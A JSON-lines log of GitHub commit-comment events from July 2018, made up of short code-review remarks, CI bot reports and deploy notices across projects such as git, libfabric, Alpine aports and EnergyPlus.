{"id":"7964143178","type":"CommitCommentEvent","actor":{"login":"dscho"},"repo":{"name":"prertik/git"},"payload":{"comment":{"id":29704829,"position":41,"line":305,"path":"builtin/rebase.c","commit_id":"48e794adc9ec29f4a970b88653dfe20de3bf87a6","created_at":"2018-07-13T20:15:44Z","updated_at":"2018-07-13T20:15:44Z","author_association":"NONE","body":"I still think that this is exactly the opposite condition from what you want to test: if it is okay to skip the `pre-rebase` hook, it should *not* be run. Currently we run it precisely then.\r\n\r\nPlease amend the commit accordingly."}},"created_at":"2018-07-13T20:15:44Z"}
{"id":"7964144003","type":"CommitCommentEvent","actor":{"login":"yburette"},"repo":{"name":"yburette/libfabric"},"payload":{"comment":{"id":29704831,"position":75,"line":313,"path":"prov/mrail/src/mrail.h","commit_id":"36f8547c983b6a1a83119e1d2687ca5ef4bb1fc6","created_at":"2018-07-13T20:15:56Z","updated_at":"2018-07-13T20:15:56Z","author_association":"OWNER","body":"count and posted are for handling the deferred subreqs. remaining_subcomps is an atomic because it is decremented every time a subreq completes.\r\nsubreq_count could be removed if it's always equal to the number of rails. I was trying to let the door open to a (future) scheduler seeing that one rail is too busy and therefore deciding to only use n-1 rails for a given RMA operation."}},"created_at":"2018-07-13T20:15:56Z"}
{"id":"7964144184","type":"CommitCommentEvent","actor":{"login":"jirutka"},"repo":{"name":"alpinelinux/aports"},"payload":{"comment":{"id":29704832,"position":19,"line":19,"path":"testing/aports-ghpr/APKBUILD","commit_id":"d102e6e0f490f27a3d320f62f1d04e84b5facbc0","created_at":"2018-07-13T20:15:59Z","updated_at":"2018-07-13T20:15:59Z","author_association":"MEMBER","body":"@ncopa: Indeed this is wrong.\r\n\r\n1. You've violated the rule about reproducible build regarding to the dependencies - each time the abuild is built it must use exactly the same sources. That's why we store and verify checksums of the sources, right? `go get` does not guarantee that at all.\r\n\r\n2. You've violated the rule about not fetching stuff from the Internet during build phase. We still don't have a suitable solution for some kinds of packages, so this is currently tolerated in some cases, but only when the tool used for fetching dependencies guarantees that it always fetch the same dependencies (e.g. using some lockfile).\r\n\r\nHave you looked into the Alpine Linux Wiki, page [APKBUILD_examples:Go](https://wiki.alpinelinux.org/wiki/APKBUILD_examples:Go)? There are not snippets of correct APKBUILDs, but there's at least a brief explanations of the problem and note about using _glide_ for the case when no vendor directory is present. This should be enough for Alpine core developer to figure out what to do. There are already many abuilds for some Go stuff using Glide or some other approach which you could looked at for example. And many devs and contributors already know this (from code reviews).\r\n\r\nAports violating the first rule are subject for reverting and it already happened few times in past."}},"created_at":"2018-07-13T20:15:59Z"}
{"id":"7964148780","type":"CommitCommentEvent","actor":{"login":"dscho"},"repo":{"name":"prertik/git"},"payload":{"comment":{"id":29704849,"position":43,"line":307,"path":"builtin/rebase.c","commit_id":"48e794adc9ec29f4a970b88653dfe20de3bf87a6","created_at":"2018-07-13T20:17:07Z","updated_at":"2018-07-13T20:17:07Z","author_association":"NONE","body":"This misses a check whether the hook ran without error. Probably\r\n\r\n```c\r\nif (!ok_to_skip_pre_rebase &&\r\n    run_hook_le(...) < 0)\r\n        die(_(\"The pre-rebase hook refused to rebase.\"));\r\n```\r\n\r\nThis also converts line 240 of `TODO-rebase.sh`.\r\n\r\nPlease amend the commit accordingly."}},"created_at":"2018-07-13T20:17:07Z"}
{"id":"7964152253","type":"CommitCommentEvent","actor":{"login":"shefty"},"repo":{"name":"yburette/libfabric"},"payload":{"comment":{"id":29704857,"position":21,"line":220,"path":"prov/mrail/src/mrail_cq.c","commit_id":"36f8547c983b6a1a83119e1d2687ca5ef4bb1fc6","created_at":"2018-07-13T20:17:58Z","updated_at":"2018-07-13T20:17:58Z","author_association":"NONE","body":"Well, lucky for you Dmitry just added support to handle CQ overruns.  Update your branch with master and look at the changes to the util_cq.  CQ overruns won't happen unless we're completely out of memory, in which case, there's basically nothing we can do but print a big ol' error message and sacrifice a chicken"}},"created_at":"2018-07-13T20:17:58Z"}
{"id":"7964155373","type":"CommitCommentEvent","actor":{"login":"Herny64"},"repo":{"name":"Herny64/qutebrowser"},"payload":{"comment":{"id":29704862,"position":null,"line":null,"path":null,"commit_id":"fd20a5d0dc0ee3d7463e9f5c9d33eb571ba5eab6","created_at":"2018-07-13T20:18:46Z","updated_at":"2018-07-13T20:18:46Z","author_association":"OWNER","body":"example usecase:\r\nusing readabilityjs* from mozilla to make websites more readable:\r\n`git clone \"https://github.com/mozilla/readability.git\" ~/.local/share/qutebrowser/js/readability`\r\nand in config.py:\r\n`config.bind(',r', 'jseval-file readability/JSDOMParser.js ;; jseval-file readability/Readability.js ;; jseval var article = new Readability(document).parse(); document.head.innerHTML = \"\"; document.body.innerHTML = article.content;')`\r\n"}},"created_at":"2018-07-13T20:18:46Z"}
{"id":"7964157218","type":"CommitCommentEvent","actor":{"login":"nasarabu"},"repo":{"name":"nasarabu/background-generator"},"payload":{"comment":{"id":29704866,"position":null,"line":null,"path":null,"commit_id":"0caf9eac53b7119e9ccad5415d89443bce84cd63","created_at":"2018-07-13T20:19:13Z","updated_at":"2018-07-13T20:19:13Z","author_association":"OWNER","body":"hey marcy look i have made some changes on text"}},"created_at":"2018-07-13T20:19:13Z"}
{"id":"7964160795","type":"CommitCommentEvent","actor":{"login":"jassingh01"},"repo":{"name":"jassingh01/sample-cloud-native-toolchain-tutorial-20180711191159435"},"payload":{"comment":{"id":29704875,"position":null,"line":null,"path":null,"commit_id":"12bd5b95b73403f7c99ef4d59feb3833443c14de","created_at":"2018-07-13T20:20:06Z","updated_at":"2018-07-13T20:20:06Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/526cd4dd-a077-4ca2-96c4-dbd1cad20d97?env_id=ibm%3Ayp%3Aus-south \"cloud-native-toolchain-tutorial-20180711191159435\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/fd7cbc36-1290-4bfe-8a11-55712eaa9bc2?env_id=ibm%3Ayp%3Aus-south \"sample-cloud-native-toolchain-tutorial-20180711191159435\") deployed [sample-cloud-native-toolchain-tutorial-20180711191159435](https://github.com/jassingh01/sample-cloud-native-toolchain-tutorial-20180711191159435/releases/tag/deploy-ibm-yp-us-south-jassingh-test-20180713-202005 \"deploy-ibm-yp-us-south-jassingh-test-20180713-202005\") to [test](https://console.bluemix.net/apps/1415a553-2bfc-4454-99c9-ba9ed7ed85f7?env_id=ibm:yp:us-south \"ibm:yp:us-south:jassingh:test\"), including this commit"}},"created_at":"2018-07-13T20:20:06Z"}
{"id":"7964161059","type":"CommitCommentEvent","actor":{"login":"pplutap"},"repo":{"name":"mazureq/Pawel-Mazurkiewicz-Kodilla-java"},"payload":{"comment":{"id":29704877,"position":21,"line":21,"path":"kodilla-exception/src/main/java/com/kodilla/exception/test/FlightFinder.java","commit_id":"3652e18709ff7124bf03e57ebf22bd441965fdec","created_at":"2018-07-13T20:20:10Z","updated_at":"2018-07-13T20:20:10Z","author_association":"NONE","body":"NullPointerException nie powinien być łapany, to zła praktyka"}},"created_at":"2018-07-13T20:20:10Z"}
{"id":"7964162787","type":"CommitCommentEvent","actor":{"login":"shefty"},"repo":{"name":"yburette/libfabric"},"payload":{"comment":{"id":29704882,"position":57,"line":272,"path":"prov/mrail/src/mrail_cq.c","commit_id":"36f8547c983b6a1a83119e1d2687ca5ef4bb1fc6","created_at":"2018-07-13T20:20:32Z","updated_at":"2018-07-13T20:20:32Z","author_association":"NONE","body":"So, the current code doesn't actually progress the EPs?  I agree that this is needed, just confused why it wasn't already part of the code path.  But maybe the development hasn't gotten this far yet.  :)"}},"created_at":"2018-07-13T20:20:32Z"}
{"id":"7964165412","type":"CommitCommentEvent","actor":{"login":"Backurio"},"repo":{"name":"Backurio/Match3Replica"},"payload":{"comment":{"id":29704884,"position":null,"line":null,"path":null,"commit_id":"1210142171fd035af8e35bdb5249d123a3c71717","created_at":"2018-07-13T20:21:10Z","updated_at":"2018-07-13T20:21:10Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [improve special matches](https://trello.com/c/UYCCrgfv/10-improve-special-matches)"}},"created_at":"2018-07-13T20:21:10Z"}
{"id":"7964168107","type":"CommitCommentEvent","actor":{"login":"zhurlik"},"repo":{"name":"Brest-Java-Course-2018/Dmitriy-Shestak"},"payload":{"comment":{"id":29704893,"position":15,"line":87,"path":"camel-integration/src/main/java/com/moro/camel/integration/processor/SoapExecutorProcessor.java","commit_id":"4c9ffb4d2b81676f6ce58d1379f68b84b4bbb969","created_at":"2018-07-13T20:21:51Z","updated_at":"2018-07-13T20:21:51Z","author_association":"NONE","body":"I am not sure that i understand what you are implementing here, but I think you can try to use here org.springframework.web.util.UriTemplate\r\nhttps://dzone.com/articles/using-uritemplate-change-path"}},"created_at":"2018-07-13T20:21:51Z"}
{"id":"7964173486","type":"CommitCommentEvent","actor":{"login":"djc"},"repo":{"name":"ivasic/abna"},"payload":{"comment":{"id":29704913,"position":null,"line":null,"path":null,"commit_id":"f593203178a99c392fb9486fcf24472df57bc6aa","created_at":"2018-07-13T20:23:10Z","updated_at":"2018-07-13T20:23:10Z","author_association":"NONE","body":"Yeah, that's a good idea. Do you want to submit it as a PR? I actually thought it might make sense to make `iban` the first argument to `mutations()`, and possibly mandatory rather than optional."}},"created_at":"2018-07-13T20:23:10Z"}
{"id":"7964173786","type":"CommitCommentEvent","actor":{"login":"dscho"},"repo":{"name":"prertik/git"},"payload":{"comment":{"id":29704914,"position":null,"line":null,"path":null,"commit_id":"454e09ef9fc92545a963b21c653f6a58890ed9c4","created_at":"2018-07-13T20:23:14Z","updated_at":"2018-07-13T20:23:14Z","author_association":"NONE","body":"The commit message says that we are verifying that there is no rebase in progress when we try to start a new one. That is indeed something we want to test (converting lines 474--488 of `TODO-rebase.sh`).\r\n\r\nHowever, the patch does the exact opposite: it verifies that sub-commands are only run when there *is* a rebase in progress.\r\n\r\nPlease reword the commit message accordingly."}},"created_at":"2018-07-13T20:23:14Z"}
{"id":"7964175044","type":"CommitCommentEvent","actor":{"login":"daprahamian"},"repo":{"name":"mongodb-js/mongodb-core"},"payload":{"comment":{"id":29704917,"position":null,"line":null,"path":null,"commit_id":"d95a4d15eea9455dff3feea38784bbaed338488d","created_at":"2018-07-13T20:23:30Z","updated_at":"2018-07-13T20:23:30Z","author_association":"CONTRIBUTOR","body":"@vkarpov15 I didn't realize that mongoose implemented a custom print function for this. What is the goal of printing out the BSON version instead of the raw options?"}},"created_at":"2018-07-13T20:23:30Z"}
{"id":"7964177029","type":"CommitCommentEvent","actor":{"login":"pplutap"},"repo":{"name":"mazureq/Pawel-Mazurkiewicz-Kodilla-java"},"payload":{"comment":{"id":29704921,"position":15,"line":15,"path":"kodilla-exception/src/main/java/com/kodilla/exception/test/FlightFinder.java","commit_id":"3652e18709ff7124bf03e57ebf22bd441965fdec","created_at":"2018-07-13T20:23:59Z","updated_at":"2018-07-13T20:23:59Z","author_association":"NONE","body":"W ifie nie należy porównywać z true. W metodzie findFlight nie powinien występować blok try catch"}},"created_at":"2018-07-13T20:23:59Z"}
{"id":"7964199474","type":"CommitCommentEvent","actor":{"login":"klindsay28"},"repo":{"name":"marbl-ecosys/MARBL"},"payload":{"comment":{"id":29704983,"position":null,"line":null,"path":null,"commit_id":"4c66e26340496f108d25943d3baf84523ba4cbd6","created_at":"2018-07-13T20:29:03Z","updated_at":"2018-07-13T20:29:03Z","author_association":"COLLABORATOR","body":"Will this reject occurrences of capital letters in these keywords within strings?\r\nThis one could be a slippery slope towards a rabbit hole."}},"created_at":"2018-07-13T20:29:03Z"}
{"id":"7964201753","type":"CommitCommentEvent","actor":{"login":"donaldrshade"},"repo":{"name":"LightSys/emailhelper-2"},"payload":{"comment":{"id":29704988,"position":null,"line":null,"path":null,"commit_id":"50ae59a7a31650e0e0b7991650c4c858d87ca207","created_at":"2018-07-13T20:29:37Z","updated_at":"2018-07-13T20:29:37Z","author_association":"CONTRIBUTOR","body":"I added User Settings using Preference Settings. This allowed for easy access in the QR activity."}},"created_at":"2018-07-13T20:29:37Z"}
{"id":"7964203101","type":"CommitCommentEvent","actor":{"login":"brandon1780"},"repo":{"name":"brandon1780/ios-sim"},"payload":{"comment":{"id":29704994,"position":27,"line":529,"path":"Source/iPhoneSimulator.m","commit_id":"b3ee3eec1d1d1024c86696fc53bd765e9b660724","created_at":"2018-07-13T20:29:56Z","updated_at":"2018-07-13T20:29:56Z","author_association":"OWNER","body":"[self LoadSimulatorFramework:developerDir]"}},"created_at":"2018-07-13T20:29:56Z"}
{"id":"7964204325","type":"CommitCommentEvent","actor":{"login":"brandon1780"},"repo":{"name":"brandon1780/ios-sim"},"payload":{"comment":{"id":29705000,"position":2,"line":1,"path":"Source/version.h","commit_id":"b3ee3eec1d1d1024c86696fc53bd765e9b660724","created_at":"2018-07-13T20:30:15Z","updated_at":"2018-07-13T20:30:15Z","author_association":"OWNER","body":"- [ ] \r\n\r\n- [ ] \r\n\r\n- [ ] "}},"created_at":"2018-07-13T20:30:15Z"}
{"id":"7964205027","type":"CommitCommentEvent","actor":{"login":"leper"},"repo":{"name":"SuperTux/supertux"},"payload":{"comment":{"id":29705005,"position":83,"line":569,"path":"src/object/bonus_block.cpp","commit_id":"00b2354085edb709cd58ff740f3697d985bd68b8","created_at":"2018-07-13T20:30:24Z","updated_at":"2018-07-13T20:30:24Z","author_association":"CONTRIBUTOR","body":"But do they both (or all of them including that red potion, whatever that is) have to be `CONTENT_CUSTOM` which isn't used by anything external to this class?\r\n\r\nThere are 3 specific checks for `CONTENT_CUSTOM` in this file that are in an if that would get a tiny bit longer, which could also be solved by eg having a `CONTENT_CUSTOM_BEGIN` and `CONTENT_CUSTOM_END` and rearranging the others so one can check for `> BEGIN && < END`.\r\n\r\nI'm not sure it would make things a lot better, but exploring whether it does might be helpful."}},"created_at":"2018-07-13T20:30:24Z"}
{"id":"7964211112","type":"CommitCommentEvent","actor":{"login":"lex111"},"repo":{"name":"translation-gang/ru.vuejs.org"},"payload":{"comment":{"id":29705026,"position":11,"line":9,"path":"src/v2/cookbook/creating-custom-scroll-directives.md","commit_id":"224d3af587cc59e3a523d75e21ff70728d90a7cd","created_at":"2018-07-13T20:31:48Z","updated_at":"2018-07-13T20:31:48Z","author_association":"MEMBER","body":"> Существует много способов как\r\n\r\nПеред \"как\" — запятая"}},"created_at":"2018-07-13T20:31:48Z"}
{"id":"7964211561","type":"CommitCommentEvent","actor":{"login":"kranar"},"repo":{"name":"eidolonsystems/nexus"},"payload":{"comment":{"id":29705028,"position":24,"line":53,"path":"Applications/spire/source/ui/properties_window_buttons_widget.cpp","commit_id":"efe6443f22014ac0506375e0c8f21c75615306f9","created_at":"2018-07-13T20:31:54Z","updated_at":"2018-07-13T20:31:54Z","author_association":"COLLABORATOR","body":"Remove the space."}},"created_at":"2018-07-13T20:31:54Z"}
{"id":"7964218803","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29705055,"position":null,"line":null,"path":null,"commit_id":"ee180c57ba07a13b087f669889a842078a5e628d","created_at":"2018-07-13T20:33:32Z","updated_at":"2018-07-13T20:33:32Z","author_association":"NONE","body":"kiva-non-quad-walls (nealkruis) - Win64-Windows-7-VisualStudio-14: Tests Failed (2406 of 2934 tests passed, 95 test warnings)\n\nMessages:\n\n * 623 tests had: EIO diffs.\n * 528 tests had: Table big diffs.\n * 11 tests had: AUD diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 95\n * Failed: 528\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ee180c57ba07a13b087f669889a842078a5e628d-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ee180c57ba07a13b087f669889a842078a5e628d-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-82.0%25-red.png)</a> \n"}},"created_at":"2018-07-13T20:33:32Z"}
{"id":"7964219602","type":"CommitCommentEvent","actor":{"login":"brandon1780"},"repo":{"name":"brandon1780/ios-sim"},"payload":{"comment":{"id":29705057,"position":null,"line":null,"path":null,"commit_id":"b3ee3eec1d1d1024c86696fc53bd765e9b660724","created_at":"2018-07-13T20:33:43Z","updated_at":"2018-07-13T20:33:43Z","author_association":"OWNER","body":"font-family:-apple-system,BlinkMacSystemFont,\"Segoe UI\",Helvetica,Arial,sans-serif,\"Apple Color Emoji\",\"Segoe UI Emoji\",\"Segoe UI Symbol\";font-size:14px;line-height:1.5;color:#24292e;background-color:#fff}a{color:#0366d6;text-decoration:none}a:hover{text-decoration:underline}b,strong{font-weight:600}hr,.rule{height:0;margin:15px 0;overflow:hidden;background:transparent;border:0;border-bottom:1px solid #dfe2e5}hr::before,.rule::before{display:table;content:\"\"}hr::after,.rule::after{display:table;clear:both;content:\"\"}table{border-spacing:0;border-collapse:collapse}td,th{padding:0}button{cursor:pointer;border-radius:0}details summary{cursor:pointer}details:not([open])>*:not(summary){display:none !important}h1,h2,h3,h4,h5,h6{margin-top:0;margin-bottom:0}h1{font-size:32px;font-weight:600}h2{font-size:24px;font-weight:600}h3{font-size:20px;font-weight:600}h4{font-size:16px;font-weight:600}h5{font-size:14px;font-weight:600}h6{font-size:12px;font-weight:600}p{margin-top:0;margin-bottom:10px}small{font-size:90%}blockquote{margin:0}ul,ol{padding-left:0;margin-top:0;margin-bottom:0}ol ol,ul ol{list-style-type:lower-roman}ul ul ol,ul ol ol,ol ul ol,ol ol ol{list-style-type:lower-alpha}dd{margin-left:0}tt,code{font-family:\"SFMono-Regular\",Consolas,\"Liberation Mono\",Menlo,Courier,monospace;font-size:12px}pre{margin-top:0;margin-bottom:0;font-family:\"SFMono-Regular\",Consolas,\"Liberation Mono\","}},"created_at":"2018-07-13T20:33:43Z"}
{"id":"7964219846","type":"CommitCommentEvent","actor":{"login":"sormuras"},"repo":{"name":"junit-team/junit5"},"payload":{"comment":{"id":29705059,"position":28,"line":37,"path":"junit-jupiter-params/src/main/java/org/junit/jupiter/params/provider/MethodSource.java","commit_id":"31e5044c021adcb14ce1b55483d25228f8e83d3f","created_at":"2018-07-13T20:33:47Z","updated_at":"2018-07-13T20:33:47Z","author_association":"MEMBER","body":"co**n**vert "}},"created_at":"2018-07-13T20:33:47Z"}
{"id":"7964220137","type":"CommitCommentEvent","actor":{"login":"yburette"},"repo":{"name":"yburette/libfabric"},"payload":{"comment":{"id":29705060,"position":75,"line":313,"path":"prov/mrail/src/mrail.h","commit_id":"36f8547c983b6a1a83119e1d2687ca5ef4bb1fc6","created_at":"2018-07-13T20:33:51Z","updated_at":"2018-07-13T20:33:51Z","author_association":"OWNER","body":"The issue I see with posts_left is that it'd be hard to know which subreq to post next when progressing a given request.\r\nHow would I determine the index of the subreq in the array?"}},"created_at":"2018-07-13T20:33:51Z"}
{"id":"7964223670","type":"CommitCommentEvent","actor":{"login":"dscho"},"repo":{"name":"prertik/git"},"payload":{"comment":{"id":29705074,"position":null,"line":null,"path":null,"commit_id":"557b97768a71b0b81f7ecea23f7c6b4e68550a92","created_at":"2018-07-13T20:34:44Z","updated_at":"2018-07-13T20:34:44Z","author_association":"NONE","body":"(Please amend this commit accordingly)"}},"created_at":"2018-07-13T20:34:44Z"}
{"id":"7964225111","type":"CommitCommentEvent","actor":{"login":"Saltgurka"},"repo":{"name":"cmangos/wotlk-db"},"payload":{"comment":{"id":29705082,"position":5,"line":4,"path":"Updates/1589_black_morass_templates.sql","commit_id":"79151fd36b0980e5f1ea9a0170accecb3755993c","created_at":"2018-07-13T20:35:04Z","updated_at":"2018-07-13T20:35:04Z","author_association":"CONTRIBUTOR","body":"These errors have now been removed \r\n\r\nhttps://github.com/cmangos/mangos-wotlk/commit/792a408c523b464ad4b64edf93ee3b332fcf61d9\r\nhttps://github.com/cmangos/mangos-wotlk/commit/c42e344f5fdd6504e32b5d13b1005c2fe0a11c8f"}},"created_at":"2018-07-13T20:35:04Z"}
{"id":"7964229427","type":"CommitCommentEvent","actor":{"login":"LucasDinoPlayzYT"},"repo":{"name":"JurassiCraftTeam/JurassiCraft2"},"payload":{"comment":{"id":29705102,"position":7,"line":25,"path":"src/main/java/org/jurassicraft/JurassiCraft.java","commit_id":"08e4e5090d923ec22de1888cd7108ab7d000e0c0","created_at":"2018-07-13T20:36:02Z","updated_at":"2018-07-13T20:36:02Z","author_association":"NONE","body":"**Thank you!**"}},"created_at":"2018-07-13T20:36:02Z"}
{"id":"7964233271","type":"CommitCommentEvent","actor":{"login":"godric-cz"},"repo":{"name":"gamecon-cz/gamecon"},"payload":{"comment":{"id":29705116,"position":null,"line":null,"path":null,"commit_id":"43a313a780e1e398c62c0267ee7b0b2cdffa2470","created_at":"2018-07-13T20:36:56Z","updated_at":"2018-07-13T20:36:56Z","author_association":"CONTRIBUTOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Mastercard: Židle org 1 a org 2](https://trello.com/c/N5LQguEV/579-mastercard-%C5%BEidle-org-1-a-org-2)"}},"created_at":"2018-07-13T20:36:56Z"}
{"id":"7964234594","type":"CommitCommentEvent","actor":{"login":"mnlevy1981"},"repo":{"name":"marbl-ecosys/MARBL"},"payload":{"comment":{"id":29705119,"position":null,"line":null,"path":null,"commit_id":"4c66e26340496f108d25943d3baf84523ba4cbd6","created_at":"2018-07-13T20:37:15Z","updated_at":"2018-07-13T20:37:15Z","author_association":"COLLABORATOR","body":"No, this is looking for an exact match of the statement (\"implicit none\", \"private\", etc) in each line of the fortran code after stripping away comments and any leading / trailing whitespace. So\r\n\r\n```\r\n  Implicit None ! We don't want any implicit variables in this module\r\n```\r\n\r\nwill be flagged, but\r\n\r\n```\r\n  character(len=*), parameter :: some_string=\"We prefer implicit none to Implicit None\"\r\n```\r\n\r\nwill not be flagged."}},"created_at":"2018-07-13T20:37:15Z"}
{"id":"7964237451","type":"CommitCommentEvent","actor":{"login":"Legrandin"},"repo":{"name":"Legrandin/pycryptodome"},"payload":{"comment":{"id":29705126,"position":null,"line":null,"path":null,"commit_id":"0df621106bda03c9a81d31afb108d1b2cd7b68cc","created_at":"2018-07-13T20:37:55Z","updated_at":"2018-07-13T20:37:55Z","author_association":"OWNER","body":"Thank you! This is 0df621106bda03c9a81d31afb108d1b2cd7b68cc on master."}},"created_at":"2018-07-13T20:37:55Z"}
{"id":"7964238865","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29705129,"position":null,"line":null,"path":null,"commit_id":"26f1e83eeeb323772e9f31bcda961d2f2af216e3","created_at":"2018-07-13T20:38:17Z","updated_at":"2018-07-13T20:38:17Z","author_association":"NONE","body":"FanEnergyIndex (XuanLuoLBL) - x86_64-MacOS-10.9-clang: OK (2937 of 2937 tests passed, 623 test warnings)\n\nMessages:\n\n * 623 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-26f1e83eeeb323772e9f31bcda961d2f2af216e3-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-26f1e83eeeb323772e9f31bcda961d2f2af216e3-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-13T20:38:17Z"}
{"id":"7964249203","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/discretisedfield-feedstock"},"payload":{"comment":{"id":29705158,"position":null,"line":null,"path":null,"commit_id":"5d80b209ebc1d1d4dd16c1b6b463456d15fc2c61","created_at":"2018-07-13T20:40:33Z","updated_at":"2018-07-13T20:40:33Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @davidcortesortuno were added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @davidcortesortuno were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-13T20:40:33Z"}
{"id":"7964255563","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"miguel-l/Stockfish"},"payload":{"comment":{"id":29705168,"position":null,"line":null,"path":null,"commit_id":"9ccb5df49f8e093bc55e566f3abd3308a011f174","created_at":"2018-07-13T20:42:04Z","updated_at":"2018-07-13T20:42:04Z","author_association":"NONE","body":"Good catch @31m059 also in my eyes this is [0,4] stuff. There's no complexity added, just a multiplication of 2 turned into a division of 2."}},"created_at":"2018-07-13T20:42:04Z"}
{"id":"7964255679","type":"CommitCommentEvent","actor":{"login":"kyogre94"},"repo":{"name":"ranul-pallemulle/RMS"},"payload":{"comment":{"id":29705169,"position":null,"line":null,"path":null,"commit_id":"0b1c4cfe2bee0b7bb15a5a7a71eb8c750f94b7f5","created_at":"2018-07-13T20:42:06Z","updated_at":"2018-07-13T20:42:06Z","author_association":"COLLABORATOR","body":"Impressive "}},"created_at":"2018-07-13T20:42:06Z"}
{"id":"7964256837","type":"CommitCommentEvent","actor":{"login":"knappk"},"repo":{"name":"FINRAOS/JTAF-ExtWebDriver"},"payload":{"comment":{"id":29705170,"position":null,"line":null,"path":null,"commit_id":"5aa3269282174298b26259d9a9c42241a082fcc2","created_at":"2018-07-13T20:42:21Z","updated_at":"2018-07-13T20:42:21Z","author_association":"COLLABORATOR","body":"Well this is awkward. I meant to commit this to knappk/master and committed to FINRAOS/master instead. Let me see if I can roll this back."}},"created_at":"2018-07-13T20:42:21Z"}
{"id":"7964263957","type":"CommitCommentEvent","actor":{"login":"mvsusp"},"repo":{"name":"aws/sagemaker-tensorflow-container"},"payload":{"comment":{"id":29705187,"position":14,"line":26,"path":"docker/1.7.0/final/py2/Dockerfile.cpu","commit_id":"f8082e05230770bdc18a423b05fcb321dbdada22","created_at":"2018-07-13T20:43:55Z","updated_at":"2018-07-13T20:43:55Z","author_association":"CONTRIBUTOR","body":"Are we sure that **LD_LIBRARY_PATH** is not required by any binary (including TensorFlow), during executing time?\r\n\r\nDo we have any special reason to not update this variable in the bash profile?"}},"created_at":"2018-07-13T20:43:55Z"}
{"id":"7964267237","type":"CommitCommentEvent","actor":{"login":"etsangsplk"},"repo":{"name":"pressly/lg"},"payload":{"comment":{"id":29705198,"position":4,"line":55,"path":"_example/main.go","commit_id":"83c229277c6898fda2f651b60e3220b312619ae8","created_at":"2018-07-13T20:44:41Z","updated_at":"2018-07-13T20:44:41Z","author_association":"NONE","body":"Looks like the fix is incorrect.\r\nhttps://github.com/go-chi/chi/blob/0c5e7abb4e562fa14dd2548cb57b28f979a7dcd9/context.go#L134"}},"created_at":"2018-07-13T20:44:41Z"}
{"id":"7964268349","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29705201,"position":null,"line":null,"path":null,"commit_id":"ca8cbb5604498d95301f1f182b9aef537b56f6c0","created_at":"2018-07-13T20:44:57Z","updated_at":"2018-07-13T20:44:57Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-af-react](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-af-react).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-af-react-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-13T20:44:57Z"}
{"id":"7964270185","type":"CommitCommentEvent","actor":{"login":"andremoeller"},"repo":{"name":"aws/sagemaker-tensorflow-container"},"payload":{"comment":{"id":29705213,"position":14,"line":26,"path":"docker/1.7.0/final/py2/Dockerfile.cpu","commit_id":"f8082e05230770bdc18a423b05fcb321dbdada22","created_at":"2018-07-13T20:45:24Z","updated_at":"2018-07-13T20:45:24Z","author_association":"CONTRIBUTOR","body":"We're reverting to using pip installed tensorflow. The previous binaries weren't installing MKL libraries correctly, which was why we're setting this in the first place.\r\n"}},"created_at":"2018-07-13T20:45:24Z"}
{"id":"7964271036","type":"CommitCommentEvent","actor":{"login":"mvsusp"},"repo":{"name":"aws/sagemaker-tensorflow-container"},"payload":{"comment":{"id":29705218,"position":11,"line":23,"path":"docker/1.7.0/final/py2/Dockerfile.cpu","commit_id":"f8082e05230770bdc18a423b05fcb321dbdada22","created_at":"2018-07-13T20:45:35Z","updated_at":"2018-07-13T20:45:35Z","author_association":"CONTRIBUTOR","body":"Do we have documentation explaining where to find this binary?\r\nDo the build process still work for customers that do not have the access to this binary?"}},"created_at":"2018-07-13T20:45:35Z"}
{"id":"7964273274","type":"CommitCommentEvent","actor":{"login":"yburette"},"repo":{"name":"yburette/libfabric"},"payload":{"comment":{"id":29705225,"position":21,"line":220,"path":"prov/mrail/src/mrail_cq.c","commit_id":"36f8547c983b6a1a83119e1d2687ca5ef4bb1fc6","created_at":"2018-07-13T20:46:07Z","updated_at":"2018-07-13T20:46:07Z","author_association":"OWNER","body":"You mean... `assert(ret == 0)`? :-)"}},"created_at":"2018-07-13T20:46:07Z"}
